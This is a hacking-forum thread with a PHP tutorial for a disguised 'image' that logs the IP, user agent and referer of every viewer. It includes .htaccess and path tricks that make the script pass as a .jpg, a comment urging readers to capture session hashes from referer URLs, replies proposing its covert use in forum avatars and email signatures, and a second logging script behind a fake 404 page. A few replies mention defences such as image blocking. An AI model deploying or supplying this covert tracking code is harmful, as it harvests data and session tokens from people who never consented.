EvilZone
Hacking and Security => Tutorials => : Kulverstukas April 10, 2015, 07:58:37 AM
-
This is an old tutorial I had saved from older boards, this member was pretty active and knowledgeable back then, but after the fall of 1nj3ct, he went someplace and I haven't seen him since then. I couldn't contact him either, would be pretty nice if he could come back :)
Anyway, this is an old tutorial, so I'm sure he wouldn't mind me posting it.
.:Intro:.
Written by t3hmadhatt3r -- Contact me at t3hmadhatt3r@gmail.com.
Hello mates. I have been working on a method of getting IP's and other info using the GD library.
.:The Code:.
Ok first we will use the GD library in php to generate a valid image in php. Here's some code to do just that:
<?php
/*
.:Made by t3hmadhtt3r -- t3hmadhatt3r@gmail.com:.
.:Please don't share! Keep this quiet!:.
.:Please be safe:.
.:Enjoy!:.
*/
// Defining Variables
$IP = $_SERVER['REMOTE_ADDR']; // Saves the IP
$UA = $_SERVER['HTTP_USER_AGENT']; // Saves the User Agent
$RE = $_SERVER['HTTP_REFERER']; // Saves the Referer
$DATE = date('l jS \of F Y h:i:s A');
$DATA = '<p>IP: '.$IP.'<br/><p>User Agent: '.$UA.'<br/><p>Referer: '.$RE.'<br/><p>Date: '.$DATE.'<br/><br/><br/>';
/*PS: Try using the referer logging feature to exploit forums and sites that keep useful info in the URL. Example: HTTP://WWW.LAMESITE.COM/POST.PHP?ID=4&HASH=(THE VICTIMS MD5 HASH)&USER=t3hmadhatt3r*/
// Writing the logs
$fp = fopen('Cool_Huh?.html', 'a');
fwrite($fp, $DATA);
fclose($fp);
// Behold the mighty GD Library ^_^
header("Content-type: image/png");
$img = ImageCreate (1, 1);
$bg = ImageColorAllocate ($img, 0, 0, 0);
$txt = ImageColorAllocate ($img, 0, 0, 0);
ImagePng($img);
// Later...
?>
More Info about that PHP GD library at http://us2.php.net/manual/en/book.image.php
.:Faking the Extension:.
Now we have a valid image but, how will we get it to work on forums that dont allow php as a image extension? Well there are two ways. One which is better than the other.
1. .htaccess (This is the best way)
If you are using a server that allows you to configure your own .htaccess file than you can add the following line to execute all files with the .jpg extension as a php file.
AddHandler application/x-httpd-php .jpg
Note: If you dont have a server that allows this I recommend looking at http://www.free-webhosts.com/search-webhosts.php?SA=.htaccess.
Now you can rename the php file to jpg and it will still work! Tricky Aye?
2. Tricky Technique (This way works just the same but is suspicious)
This technique can be done on most servers (I tried it on t35 and got some Permission errors... Probably because of the Jail Shell) but, It could get some attention from a admin pretty quickly. Just add a /image.jpg to the end of the PHP file.
Example:
http://subdomain.whatever.com/script.php/image.jpg
This will make it look like the extension is jpg but the php will ignore it and execute normally.
.:Ending:.
Now you can embed this image in forums just like any other image.
Enjoy the code!
-- t3hmadhatt3r;
-
Huh i really don't follow why this is useful?
-
Huh i really don't follow why this is useful?
You can use this as a fake image on a forum and harvest session-related data of users visiting a page embedding it.
For instance, I host that php script on some server and make my profile picture on some shtty forum link to it. Then I start
posting around etc. As soon as someone reads one of my posts, the script gets executed, which means that I can do some fancy stuff to the visitors.
That's how I got it, I might be wrong.
-
You can use this as a fake image on a forum and harvest session-related data of users visiting a page embedding it.
For instance, I host that php script on some server and make my profile picture on some shtty forum link to it. Then I start
posting around etc. As soon as someone reads one of my posts, the script gets executed, which means that I can do some fancy stuff to the visitors.
That's how I got it, I might be wrong.
Yes, pretty much this. It has been done few times on this forum, but those users were warned and/or banned.
-
Yes, pretty much this. It has been done few times on this forum, but those users were warned and/or banned.
Oops, shouldn't have said "shitty forum" then. ^^
-
IIRC we have safeguards in place so nignogs can't do that any more.
-
Then HF here i come. I might create a productive botnet out of them HF ninjas.
-
this is called tracking pixel.
http://stackoverflow.com/questions/13079666/developing-a-tracking-pixel
if you implement this in an E-Mail you get the time when the E-Mail was read.
-
its awesome :D
i have 2 question ?
does it still works ??
& how to protect ourself or suppose i own a forum how to protect members from it ??
-
does it still works ??
Yes and it will as long as PHP is around.
how to protect ourself or suppose i own a forum how to protect members from it ??
You can't. IMO only thing you can do is surf the web through proxies if you're that paranoid...
For protecting people in a forum - well, disable avatars and signatures, and you can probably forbid images in posts too, but users might not like it.
-
Yes and it will as long as PHP is around.
You can't. IMO only thing you can do is surf the web through proxies if you're that paranoid...
For protecting people in a forum - well, disable avatars and signatures, and you can probably forbid images in posts too, but users might not like it.
I second using a VPN all the time. It will encrypt your traffic out of your network in case something on your network has been pwnned and will stop these people from getting your IP. If you want to be anonymous than change your IP when you switch between personas and use a very commonly used VPN.
-
would i be possible to tweak this script into eg. doing redirects? Like on sites that only allow image upload and when users then visit image-url they get redirected?
-
I suppose, by using a header() function, or cURL.
-
I wonder if there is a method similar to this,that can be deployed and embedded in emails. You send an email to an individual or group of individuals, then magic happens the moment your email is opened by others?
-
Well since it is possible to send emails in HTML format, you can include JavaScript. But I guess it won't be very successful since some security measures should be in place to prevent this kind of threat. Is that what you meant? Can't think of something more sophisticated right now.
-
Well since it is possible to send emails in HTML format, you can include JavaScript. But I guess it won't be very successful since some security measures should be in place to prevent this kind of threat. Is that what you meant? Can't think of something more sophisticated right now.
Correct. Now hear my idea, you know in emails you can always use a signature at the end of every email you send, for example.
Micheal J
General director
XY company
Address.....
Right. Now in theory, you can replace this signature with an image, simply take any email with a signature, do a print screen, paste it in paint, cut the signature and upload it as a jpg using this php trick, send another email to a certain individual with the signature being the php image.
I hope you get my idea?
-
ThunderBird blocks images for every letter when viewing it unless the user clicks a button to view the images. Just sayin'...
-
Same for Gmail etc.
-
Here's an example that works with .htaccess to generate images a couple different ways. (All of them are basically using the output of file_get_contents). It's designed to be "index.php" in, say, your /images/ directory. URL's can be "site.com/images/whatever.jpg", and you can generate the image like the original, read it from disk, DB, etc.
Please don't use a database to store images in real life.
<?php
// Log the json-encoded SERVER array for later parsing. This can also be had from access.log
error_log(json_encode($_SERVER));
if (isset($_GET['f'])) {
/* prevent path traversal */
$f = basename($_GET['f']);
/**
* Determine the picture by UserAgent
*/
$image = '';
if ($f == 'useragent.png') {
if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'linux')) {
$image = 'linux.png';
} elseif (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'windows')) {
$image = 'windows.png';
} elseif (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'osx')) {
$image = 'osx.png';
}
/*
* You could then continue with the image manipulation functions
* to output text. e.g., timestamps, 'your IP is..' images, etc.
*/
/**
* Just read out the file
*/
if ($image && file_exists($image)) {
header('COntent-Type: image/png');
die(file_get_contents($image));
}
}
/**
* An example of aliasing an image to another site.
* The IP of your server will be visible in evilzone's logs
* each time someone views this page.
*/
if ($f == 'hacking.jpg' || $f = 'hacking.foo') {
header('Content-Type: image/png');
die(file_get_contents('https://evilzone.org/logo_02.png'));
}
/**
* You'll obviously need a database with info for this to work.
*/
if ($f == 'database.png') {
$stmt = $pdo->prepare('SELECT image_data, content_type FROM images WHERE image_name = :name');
$stmt->execute(array('name' => $f));
$row = $stmt->fetch();
header('Content-Type: ' . $row['content_type']);
die($row['image_data']);
}
/**
* Get from local filesystem
* 1) Don't trust user's file extension for Content-Type and do some
* long switch/case. Just read it from the source file.
*/
if ($f && file_exists($f)) {
$contentType = exif_imagetype($f);
header("Content-Type: {$contentType}");
die(file_get_contents($f));
}
}
/**
* Make it look like native 404 page
*/
header('HTTP/1.0 404 - Not Found');
$url = htmlentities($_SERVER['REQUEST_URI']);
$html=<<<EOF
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL {$url} was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at {$SERVER['SERVER_NAME']} Port {$_SERVER['SERVER_PORT']}</address>
</body></html>
EOF;
die($html);
And the .htaccess rewrite rule:
RewriteEngine On
# Redirect /<file>.<ext> to index.php?f=<file>.<ext> [NoCasesensitive, Last]
RewriteRule ([^\.]+)\.(png|jpg|gif)$ index.php?f=$1.$2 [NC,L]